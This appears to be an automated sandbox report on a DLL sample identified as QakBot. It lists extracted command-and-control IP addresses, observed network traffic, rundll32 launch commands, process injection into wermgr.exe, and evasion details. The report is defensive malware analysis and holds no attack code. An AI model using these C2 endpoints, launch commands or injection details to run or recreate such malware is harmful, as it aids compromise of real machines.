Source: Malware configuration extractor	IPs: 86.132.236.117:443
Source: Malware configuration extractor	IPs: 92.154.17.149:2222
Source: Malware configuration extractor	IPs: 223.166.13.95:995
Source: Malware configuration extractor	IPs: 89.36.206.69:995
Source: Malware configuration extractor	IPs: 96.56.197.26:2083
Source: Malware configuration extractor	IPs: 78.18.105.11:443
Source: Malware configuration extractor	IPs: 82.127.153.75:2222
Source: Malware configuration extractor	IPs: 90.78.147.141:2222
Source: Malware configuration extractor	IPs: 82.131.141.209:443
Source: Malware configuration extractor	IPs: 183.87.163.165:443
Source: Malware configuration extractor	IPs: 92.9.45.20:2222
Source: Malware configuration extractor	IPs: 80.6.50.34:443
Source: Malware configuration extractor	IPs: 80.12.88.148:2222
Source: Malware configuration extractor	IPs: 69.133.162.35:443
Source: Malware configuration extractor	IPs: 172.115.17.50:443
Source: Malware configuration extractor	IPs: 95.45.50.93:2222
Source: Malware configuration extractor	IPs: 12.172.173.82:2087
Source: Malware configuration extractor	IPs: 103.140.174.20:2222
Source: Malware configuration extractor	IPs: 24.198.114.130:995
Source: Malware configuration extractor	IPs: 50.68.204.71:443
Source: Malware configuration extractor	IPs: 69.119.123.159:2222
Source: Malware configuration extractor	IPs: 64.121.161.102:443
Source: Malware configuration extractor	IPs: 2.82.8.80:443
Source: Malware configuration extractor	IPs: 184.181.75.148:443
Source: Malware configuration extractor	IPs: 70.112.206.5:443
Source: Malware configuration extractor	IPs: 198.2.51.242:993
Source: Malware configuration extractor	IPs: 2.36.64.159:2078
Source: Malware configuration extractor	IPs: 79.77.142.22:2222
Source: Malware configuration extractor	IPs: 84.215.202.8:443
Source: Malware configuration extractor	IPs: 147.219.4.194:443
Source: Malware configuration extractor	IPs: 116.74.164.81:443
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 12.172.173.82:995
Source: Malware configuration extractor	IPs: 77.86.98.236:443
Source: Malware configuration extractor	IPs: 104.35.24.154:443
Source: Malware configuration extractor	IPs: 213.64.33.61:2222
Source: Malware configuration extractor	IPs: 47.149.134.231:443
Source: Malware configuration extractor	IPs: 72.134.124.16:443
Source: Malware configuration extractor	IPs: 47.34.30.133:443
Source: Malware configuration extractor	IPs: 103.42.86.42:995
Source: Malware configuration extractor	IPs: 174.4.89.3:443
Source: Malware configuration extractor	IPs: 161.142.103.187:995
Source: Malware configuration extractor	IPs: 78.160.146.127:443
Source: Malware configuration extractor	IPs: 84.35.26.14:995
Source: Malware configuration extractor	IPs: 12.172.173.82:20
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 124.149.143.189:2222
Source: Malware configuration extractor	IPs: 70.160.67.203:443
Source: Malware configuration extractor	IPs: 186.64.67.30:443
Source: Malware configuration extractor	IPs: 103.123.223.133:443
Source: Malware configuration extractor	IPs: 188.28.19.84:443
Source: Malware configuration extractor	IPs: 174.58.146.57:443
Source: Malware configuration extractor	IPs: 94.207.104.225:443
Source: Malware configuration extractor	IPs: 86.97.55.89:2222
Source: Malware configuration extractor	IPs: 69.123.4.221:2222

Source: Joe Sandbox View	ASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT
Source: Joe Sandbox View	ASN Name: ASN-CXA-ALL-CCI-22773-RDCUS ASN-CXA-ALL-CCI-22773-RDCUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 2.82.8.80 2.82.8.80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: global traffic

TCP traffic: 192.168.2.5:49748 -> 85.57.212.13:3389

Source: unknown

Network traffic detected: IP country count 30

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 85.57.212.13
Source: unknown	TCP traffic detected without corresponding DNS query: 85.57.212.13
Source: unknown	TCP traffic detected without corresponding DNS query: 85.57.212.13
Source: unknown	TCP traffic detected without corresponding DNS query: 85.57.212.13
Source: unknown	TCP traffic detected without corresponding DNS query: 85.57.212.13

Source: national[1].htm.24.dr

String found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)

Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.399211143.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.407006224.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.414998004.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.414998450.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.419061010.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F072.dll	String found in binary or memory: https://streams.videolan.org/upload/
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/networkmanagement

Source: unknown

DNS traffic detected: queries for: xfinity.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.5:49731 version: TLS 1.2

Source: loaddll32.exe, 00000000.00000002.409804519.000000000123B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: F072.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D060	3_2_1000D060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10028070	3_2_10028070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002B0AB	3_2_1002B0AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000B0D0	3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10008144	3_2_10008144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002A1A1	3_2_1002A1A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100101D0	3_2_100101D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001021B	3_2_1001021B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10027220	3_2_10027220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10007270	3_2_10007270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10024280	3_2_10024280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002334C	3_2_1002334C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100353B0	3_2_100353B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100243C0	3_2_100243C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013480	3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1004C4C0	3_2_1004C4C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D4D0	3_2_1000D4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001F523	3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100105C0	3_2_100105C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100215D0	3_2_100215D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000164B	3_2_1000164B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100206A7	3_2_100206A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10010750	3_2_10010750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000E760	3_2_1000E760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10010778	3_2_10010778
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002A800	3_2_1002A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_049571FF	17_2_049571FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_04958D30	17_2_04958D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_0495320D	17_2_0495320D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_04943A40	17_2_04943A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_04956E40	17_2_04956E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_04954A6F	17_2_04954A6F

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_0494A412 NtAllocateVirtualMemory,NtWriteVirtualMemory,	17_2_0494A412
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_0494A823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	17_2_0494A823
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_0494CA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,	17_2_0494CA0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_049543F4 NtProtectVirtualMemory,NtProtectVirtualMemory,	17_2_049543F4

Source: F072.dll

Binary or memory string: OriginalFilenameavutil-lav-57.dll. vs F072.dll

Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncryptsslp.dll

Source: F072.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\F072.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",next
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",next	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wermgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Ixayi

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF92.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@31/23@2/100

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_0494D213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

17_2_0494D213

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_0494C71C CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,

17_2_0494C71C

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5240
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{26CAAE63-F26A-4151-91F8-5B190E00B3CB}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5708
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5236
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4696
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4732
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E98255E4-990A-4ADC-9ACC-3D92A2E78CDC}
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{26CAAE63-F26A-4151-91F8-5B190E00B3CB}

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: F072.dll

Static PE information: More than 582 > 100 exports found

Source: F072.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,

3_2_1001F523

Source: F072.dll

Static PE information: real checksum: 0xf1b7b should be: 0xf2fd9

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 6828 base: 1093C50 value: E9 63 D7 69 FF

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
